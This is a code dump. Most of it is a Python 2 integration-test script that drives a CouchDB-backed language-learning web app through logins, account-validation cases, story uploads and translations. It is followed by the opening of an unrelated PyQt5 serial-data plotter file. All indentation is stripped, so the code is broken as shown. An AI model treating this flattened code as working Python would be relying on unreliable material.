tlog("Creating container: " + option["name"])
details = c.create_container(**option)
tlog("Creation complete.")
c.start(option["name"])
port = option["ports"][0]
hostname = c.inspect_container(option["name"])["NetworkSettings"]["IPAddress"]
#hostname = parameters["couch_server"]
wait_for_port_ready(option["name"], "http", hostname, port)
if len(sys.argv) > 1 and sys.argv[1] == "stop" :
tlog("Containers are created. Stopping now.")
exit(0)
urls = []
if "test" not in parameters or not parameters["test"] :
parameters["trans_scope"] = "http://localhost:" + str(server_port) + "/TranslatorRequest"
parameters["trans_access_token_url"] = "http://localhost:" + str(server_port) + "/TranslatorAccess"
httpd = TimeoutServer(('127.0.0.1', server_port), MyHandler)
oresp = Thread(target=oauth_responder, args = [httpd])
oresp.daemon = True
oresp.start()
parameters["timeout"] = test_timeout * 2
#parameters["multipliers"] = { "days" : 7, "weeks" : 4, "months" : 12, "years" : 10, "decades" : 10 }
#parameters["counts"] = { "days" : 1, "weeks" : 7, "months" : 30, "years" : 365, "decades" : 3650 }
#parameters["seconds_in_day"] = 60*60*24
mthread = Thread(target=go, args = [parameters])
mthread.daemon = True
mthread.start()
wait_for_port_ready("mica", test["target_proto"], test["target"], test["target_port"])
tlog("Waiting for startup...")
sleep(10)
r = s.get(target + "/disconnect", verify = target_verify)
assert(r.status_code == 200)
r = s.get(target, verify = target_verify)
assert(r.status_code == 200)
d = pq(s.get(target, verify = target_verify).text)
def add_oauth_tests() :
for who in parameters["oauth"].keys() :
if who == "redirect" :
continue
for part in d("#oauth_" + who).attr("href").split("&") :
if part.count("state") :
state = part.split("=")[1]
oauth["states"][who] = state
oauth["codes"][who] = binascii_hexlify(os_urandom(4))
urls.append(common_urls["logout"])
urls.append(dict(loc = "/api?human=0&alien=" + who + "&connect=1&finish=1&state=" + state + "&code=" + oauth["codes"][who], method = "get", data = {}, success = True, test_success = True, retry_action = "logout"))
parameters["oauth"][who]["token_url"] = "http://localhost:" + str(server_port) + "/" + who
parameters["oauth"][who]["lookup_url"] = "http://localhost:" + str(server_port) + "/" + who
urls.append(common_urls["logout"])
break
common_urls = {
"storylist" : [
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000", "method" : "get", "success" : True, "test_success" : True },
],
"storylist_rotate" : [
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000&force_rotate=1", "method" : "get", "success" : True, "test_success" : True },
],
"storylist_triple" : [
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000", "method" : "get", "success" : True, "test_success" : True },
],
"logout" : [
{ "loc" : "/api?human=0&alien=disconnect", "method" : "get", "success" : True, "test_success" : True },
],
"login" : [
{ "loc" : "/connect", "method" : "post", "success" : True, "test_success" : True, "data" : dict(human='0', username=test["username"], password=test["password"], remember='on', address=parameters["couch_proto"] + "://" + parameters["couch_server"] + ":" + str(parameters["couch_port"]), connect='1') },
],
"relogin" : [
{ "loc" : "/api?human=0&alien=disconnect", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/connect", "method" : "post", "success" : True, "test_success" : True, "data" : dict(human='0', username=test["username"], password=test["password"], remember='on', address=parameters["couch_proto"] + "://" + parameters["couch_server"] + ":" + str(parameters["couch_port"]), connect='1') },
],
"account" : [
{ "loc" : "/api?human=0&alien=account", "method" : "get", "success" : True, "test_success" : True },
],
}
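# Each test step in this file is a dict that run_tests() consumes. Judging purely from
# how the entries are written here, the keys appear to mean roughly:
#   loc          - request path on the MICA server (or on CouchDB when "couch" is True)
#   method       - "get", "post" or "put" ("none" for sleep pseudo-steps)
#   success      - expected value of the success flag in the JSON reply (None = don't check)
#   test_success - whether the step as a whole is expected to pass
#   data         - form/query payload sent with the request
# This summary is inferred from usage in this file, not from run_tests() itself.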
def init_and_translate(storyname) :
return [
# Need to retrieve the UUID again for the story initialization.
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + storyname, "method" : "get", "success" : None, "test_success" : None, "couch" : True},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", storyinit = 1, name = storyname), "check_job_running" : False},
] + common_urls["storylist_triple"] + [
# This get is only to retrieve the UUID again for the story initialization.
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + storyname, "method" : "get", "success" : None, "test_success" : None, "couch" : True},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", translate = 1, name = storyname), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "read", tstatus = 1), "check_job_running" : False, "until" : { "path" : ["translated", "translating"], "equals" : "no"}},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "read", tstatus = 1), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", reviewed = 1), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", reviewed = 0), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", reviewed = 1), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", finished = 1), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", finished = 0), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", finished = 1), "check_job_running" : False},
] + common_urls["storylist_triple"]
def file_story(filename, languagetype, filetype, mimetype) :
return [
{ "loc" : "/api?human=0&alien=home", "method" : "post", "success" : True, "test_success" : True, "data" : dict(filetype = filetype, filename = filename, languagetype = languagetype, uploadfile = "1") },
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + filename, "method" : "get", "success" : None, "test_success" : None, "couch" : True},
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + filename + "/" + filename, "method" : "put", "success" : None, "test_success" : None, "upload" : filename, "upload_type" : mimetype, "forward_keys" : ["_rev/rev"], "data" : {}, "couch" : True},
] + common_urls["storylist_triple"]
def txt_story(storyname, languagetype, source) :
return [
{ "loc" : "/api?human=0&alien=home", "method" : "post", "success" : True, "test_success" : True, "data" : dict(storyname = storyname, languagetype = languagetype, uploadtext = "1") },
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + storyname, "method" : "get", "success" : None, "test_success" : None , "couch" : True},
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + storyname + "?authorization=false", "method" : "put", "success" : None, "test_success" : None, "data" : {"_id" : "MICA:family@hinespot.com:stories:" + storyname, "format" : 2, "filetype" : "txt", "source_language" : languagetype.split(",")[1], "reviewed": False, "date" : 1449946344.440684, "nb_pages" : 0, "name" : storyname, "translated": False, "new" : True, "target_language" : languagetype.split(",")[0], "txtsource" : "从前有个小孩,爸爸死了,妈妈病了,日子可不好过了。"}, "forward_keys" : ["_rev"], "couch" : True},
] + common_urls["storylist_triple"]
try :
tests = [
common_urls["logout"],
{ "loc" : "/connect", "method" : "post", "success" : False, "test_success" : False, "data" : dict(human='0', username=test["username"], password="wrongpassword", remember='on', address=couch, connect='1') },
common_urls["login"],
common_urls["storylist"],
common_urls["storylist_rotate"],
{ "repeat" : 80, "urls" : [
{ "loc" : "/api?human=0&alien=read&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&memolist=1&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&memorized=1&nb_unit=8&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&memorized=0&nb_unit=3&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0&image=0", "method" : "get", "success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&memolist=1&page=0", "method" : "get", "success" : True },
{ "loc" : "/api?human=0&alien=instant&source=%E7%82%8E%E7%83%AD&lang=en&source_language=zh-CHS&target_language=en", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&switchmode=text", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&reviewlist=1&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&multiple_select=1&index=1&nb_unit=12&trans_id=10&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&multiple_select=1&index=1&nb_unit=48&trans_id=42&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home", "method" : "post", "success" : True, "test_success" : True, "data" : dict(retranslate = '1', page = '0', uuid = 'b220074e-f1a7-417b-9f83-e63cebea02cb') },
# Assert that the default has changed and move multiple_select to actual JSON, then retry the request
{ "loc" : "/api?human=0&alien=edit&view=1", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=edit&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=edit&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&editslist=1&page=0", "method" : "get", "success" : True, "test_success" : True },
]
},
{ "loc" : "/api?human=0&alien=edit", "method" : "post", "success" : True, "test_success" : True, "data" : dict(oprequest = '[{"operation":"split","uuid":"b220074e-f1a7-417b-9f83-e63cebea02cb","units":1,"failed":false,"chars":"小鸟","pinyin":"xiǎo+niǎo","nbunit":"8","uhash":"0b23c772194ef5a97aa23d5590105665","index":"-1","pagenum":"0","out":""},{"operation":"merge","uuid":"b220074e-f1a7-417b-9f83-e63cebea02cb","units":2,"failed":false,"chars":"跳","pinyin":"tiào","nbunit0":"45","uhash0":"0cdbc17e9ed386e3f3df2b26ed5b5187","index0":"-1","page0":"0","chars0":"跳","pinyin0":"tiào","nbunit1":"46","uhash1":"0cdbc17e9ed386e3f3df2b26ed5b5187","index1":"-1","page1":"0","chars1":"跳","pinyin1":"tiào","out":""}]', uuid = "b220074e-f1a7-417b-9f83-e63cebea02cb") },
{ "loc" : "/api?human=0&alien=edit", "method" : "post", "success" : True, "test_success" : True, "data" : dict(oprequest = '[{"operation":"split","uuid":"b220074e-f1a7-417b-9f83-e63cebea02cb","units":1,"failed":false,"chars":"山羊","pinyin":"shān+yáng","nbunit":"111","uhash":"fb7335cbba25395d3b9a867ddad630fd","index":"-1","pagenum":"0","out":""}]', uuid = "b220074e-f1a7-417b-9f83-e63cebea02cb") },
# Bulk review: not tested
#{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=128", "method" : "get", "success" : True, "test_success" : True },
#{ "loc" : "/api?human=0&alien=home", "method" : "post", "success" : True, "test_success" : True, "data" : dict(transid0 = 67, index0 = 1, nbunit0 = 75, page0 = 151, transid1 = 74, index1 = 1, nbunit1 = 84, page1 = 151, transid2 = 81, index2 = 1, nbunit2 = 93, page2 = 151, transid3 = 88, index3 = 1, nbunit3 = 102, page3 = 151, transid4 = 105, index4 = 1, nbunit4 = 123, page4 = 151, count = 5, bulkreview = 1) },
#{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "repeat" : 80, "urls" : [
# Switch to split view on sample
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&switchmode=both", "method" : "get", "success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=151&image=0", "method" : "get", "success" : True, "test_success" : True },
# Switch to image-only
{ "loc" : "/api?human=0&alien=home&switchmode=images", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=151&image=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
# Switch back to text-only
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&switchmode=badviewmode", "method" : "get", "success" : False, "test_success" : False },
{ "loc" : "/api?human=0&alien=home&switchmode=text", "method" : "get", "success" : True, "test_success" : True },
# Go to page 35
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=34", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=34", "method" : "get", "success" : True, "test_success" : True },
# Go to last page
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=239", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=239", "method" : "get", "success" : True, "test_success" : True },
# Go one page past the end
# Javascript won't let us do this, but I might screw up
# Will cause a replication error, requiring us to re-login
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=240", "method" : "get", "success" : False, "test_success" : False },
common_urls["login"],
# Go one page before the beginning.
{ "loc" : "/api?human=0&alien=read&meaningmode=true", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&meaningmode=false", "method" : "get", "success" : True, "test_success" : True },
# Muck with account
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=1, tofrom='zh-CHS,en') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=0, tofrom='zh-CHS,en') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=1, tofrom='es,en') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=0, tofrom='es,en') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=1, tofrom='en,es') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=0, tofrom='en,es') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=1, tofrom='en,zh-CHS') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=0, tofrom='en,zh-CHS') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(remove=0, tofrom='nosuchdictionary') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = "whoops2@whoops.com", username = "whoops2@whoops.com", password = "short", confirm = "short", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = "whoops2@whoops.com", username = "whoops2@whoops.com", password = "verylongpass", confirm = "notsame", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = "whoops2@whoops.com", username = "whoops2@whoops.com", password = "verylongpass", confirm = "notsame", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = "whoop2@whoops.com", username = "bad:username", password = "verylongpass", confirm = "verylongpass", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(email = "whoops2@whoops.com", username = "whoops2@whoops.com", password = "verylongpass", confirm = "verylongpass", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account&deleteaccount=1&username=nosuchaccount", "method" : "get", "success" : False, "test_success" : True },
{ "loc" : "/api?human=0&alien=account&deleteaccount=1&username=whoops2@whoops.com", "method" : "get", "success" : True, "test_success" : True },
]
# end of repeated section
},
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(email = "whoops3@whoops.com", username = "whoops3@whoops.com", password = "verylongpass", confirm = "verylongpass", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(email = "whoops3@whoops.com", username = "whoops3@whoops.com", password = "verylongpass", confirm = "verylongpass", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account&pack=1", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=account", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(oldpassword = test["password"], password = "short", confirm = "short", changepassword = "1") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(oldpassword = test["password"], password = "notthesame", confirm = "foobarbaz", changepassword = "1") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(oldpassword = "wrongoldpassword", password = "foobarbaz", confirm = "foobarbaz", changepassword = "1") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(oldpassword = test["password"], password = "foobarbaz", confirm = "foobarbaz", changepassword = "1") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(oldpassword = "foobarbaz", password = test["password"], confirm = test["password"], changepassword = "1") },
{ "loc" : "/api?human=0&alien=account&resetpassword=1", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(password = test["password"], confirm = test["password"], changepassword = "1"), "forward_keys" : ["oldpassword"] },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(language = 'badlanguage', changelanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(language = 'en', changelanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(learnlanguage = 'badlanguage', changelearnlanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(learnlanguage = 'py', changelearnlanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(learnlanguage = 'zh', changelearnlanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = 'waaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaytoolong@email.com', changeemail = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = 'email withspace@email.com', changeemail = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = 'emailwithoutatsymbol', changeemail = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(email = 'normal@email.com', changeemail = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setappchars = '1001') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setappchars = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(setappchars = 'notanumber') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(setappchars = '70') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setwebchars = '1001') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setwebchars = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(setwebchars = 'notanumber') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(setwebchars = '70') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setwebzoom = '3.1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setwebzoom = '0.4') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(setwebzoom = 'notanumber') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(setwebzoom = '1.0') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setappzoom = '3.1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setappzoom = '0.4') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(setappzoom = 'notanumber') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(setappzoom = '1.0') },
common_urls["account"],
{ "repeat" : 10, "urls" : [
{ "sleep" : test_timeout * 2, "loc" : "sleep", "method" : "none" },
common_urls["login"],
]
},
txt_story("chinese_test", "zh-CHS,en", "从前有个小孩,爸爸死了,妈妈病了,日子可不好过了。"),
init_and_translate("chinese_test"),
txt_story("english_test", "en,zh-CHS", "this is a test"),
init_and_translate("english_test"),
file_story("asample1.pdf", "zh-CHS,en", "pdf", "application/pdf"),
init_and_translate("asample1.pdf"),
file_story("family.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("family.txt"),
file_story("asample2.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("asample2.txt"),
file_story("bao.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("bao.txt"),
file_story("book1234.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("book1234.txt"),
file_story("little_bear.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("little_bear.txt"),
file_story("little_bird.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("little_bird.txt"),
# Tests that cause purges and long map reduces.
{ "loc" : "/api?human=0&alien=home&forget=1&uuid=5989087e-6896-4653-b91e-d6422d6b369a", "method" : "get", "success" : True, "test_success" : True, "check_job_running" : False },
common_urls["storylist_triple"],
{ "loc" : "/api?human=0&alien=home&delete=1&uuid=5989087e-6896-4653-b91e-d6422d6b369a&name=bao_gong_interrogates_a_rock.txt", "method" : "get", "success" : True, "test_success" : True, "check_job_running" : False },
common_urls["storylist_triple"],
common_urls["relogin"],
{ "repeat" : 2, "urls" : [
{ "sleep" : test_timeout * 2, "loc" : "sleep", "method" : "none" },
common_urls["login"],
]
},
# Long-running, but excellent test to delete a large story:
{ "loc" : "/api?human=0&alien=home&forget=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9", "method" : "get", "success" : True, "test_success" : True, "check_job_running" : False },
common_urls["storylist_triple"],
{ "loc" : "/api?human=0&alien=home&delete=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&name=301_book1.pdf", "method" : "get", "success" : True, "test_success" : True, "check_job_running" : False },
common_urls["storylist_triple"],
common_urls["relogin"],
{ "repeat" : 2, "urls" : [
{ "sleep" : test_timeout * 2, "loc" : "sleep", "method" : "none" },
common_urls["login"],
]
},
# TODO:
# Test bulk edits
# Test parallel requests of everything
# Audit usage of "success"
# Test quotas
# { "stop" : True },
]
except Exception, e :
tlog(str(e))
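# add_chat_tests: replays pre-recorded API query strings from chats.txt, one request per
# line; "storylist" lines trigger a story-list rotation, and lines containing "source="
# skip the success-flag check.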
def add_chat_tests() :
chatfname = cwd + 'chats.txt'
chatfd = open(chatfname, 'r')
tlog("Reading in chat tests...")
#urls.append(common_urls["relogin"])
while True :
line = chatfd.readline().strip()
if not line :
break
if line == "storylist" :
urls.append(common_urls["storylist_rotate"])
elif line.count("source=") :
urls.append({"loc" : "/api?" + line, "method" : "get", "success" : None, "test_success" : True})
else :
urls.append({"loc" : "/api?" + line, "method" : "get", "success" : True, "test_success" : True})
chatfd.close()
urls.append(common_urls["storylist_rotate"])
#urls.append(common_urls["logout"])
#urls.append({ "stop" : True })
try :
urls += tests
for x in range(0, 100) :
add_oauth_tests()
add_chat_tests()
sleep(5)
urls.append(common_urls["logout"])
urls.append({ "stop" : True })
except Exception, e :
for line in format_exc().splitlines() :
tlog(line)
old_timeout = int(change_timeout(test_timeout)[1:-2])
stop = True
good = True
try :
stop = run_tests(urls)
except AssertionError, e :
tlog(str(e))
good = False
except Exception, e :
for line in format_exc().splitlines() :
tlog(line)
#pass
change_timeout(604800)
#change_timeout(old_timeout)
record.close()
httpd.socket.close()
if not stop :
try:
secs = int(time()) - start_time
tlog("Done in " + str(secs) + " secs. Application left running...")
while True :
sleep(10)
except KeyboardInterrupt:
tlog("CTRL-C interrupt")
exit(0 if good else 1)
|
plotter_window.py
|
import re
import sys
from threading import Thread
import matplotlib as mpl
import numpy as np
import serial
from PyQt5 import QtGui
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QFileDialog, QTextEdit, \
QComboBox, QMainWindow, QGridLayout, QLabel
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT
from matplotlib.figure import Figure
from pathlib import Path
import pandas as pd
mpl.use('Qt5Agg')
class Canvas(FigureCanvasQTAgg):
def __init__(self, parent=None, width=5, height=8, dpi=100):
fig = Figure(figsize=(width, height), dpi=dpi)
self.axes = fig.add_subplot(111)
super(Canvas, self).__init__(fig)
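# Window: main GUI. A background thread reads the serial port, appends samples to
# y_data, and the plot is redrawn with only the most recent n_data points.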
class Window(QMainWindow):
def __init__(self):
super().__init__()
self.layout = QGridLayout(self)
self.main_widget = QWidget(self)
self.textbox = QTextEdit(self)
self.cursor = self.textbox.textCursor()
self.comboBoxCOM = QComboBox(self)
self.comboBoxBaud = QComboBox(self)
self.comboBoxBit = QComboBox(self)
self.comboBoxStopBits = QComboBox(self)
self.comboBoxParity = QComboBox(self)
self.comboBoxSensor = QComboBox(self)
self.main_plot = Canvas(self, width=5, height=7, dpi=100)
self.toolbar = NavigationToolbar2QT(self.main_plot, self)
self.timebase = 50 # ms
self.n_data = 100
self.x_data_plot = list(range(self.n_data))
self.plot_yrange = {"acc": [-2200, 2200], "gyr": [-1500000, 1500000], "enc": [-50, 50]}
self.x_data = np.array([])
self.y_data = [[np.array([]) for _ in range(3)] for _ in range(3)] # accel, gyro, enc
self._plot_refs = [None, None, None]
self._stop_flag = False
self._reading_thread = None
self.plot_colours = ("r", "g", "b")
self._title = "DATA PLOTTER"
self._positions = (200, 100, 1200, 900) # right, down, width, height
self.com_port = "COM3"
self.baud_rate = "115200"
self.data_bits = "8"
self.parity = "NONE"
self.stop_bits = "1"
self.sensor = "ACCELEROMETER"
self.init_main_widget()
self.setCentralWidget(self.main_widget)
self.init_basic_elements()
def init_main_widget(self):
self.textbox.setReadOnly(True)
for widget in (self.main_plot, self.toolbar, self.textbox):
self.layout.addWidget(widget)
self.main_widget.setLayout(self.layout)
def init_basic_elements(self):
self.setWindowTitle(self._title)
self.setGeometry(*self._positions)
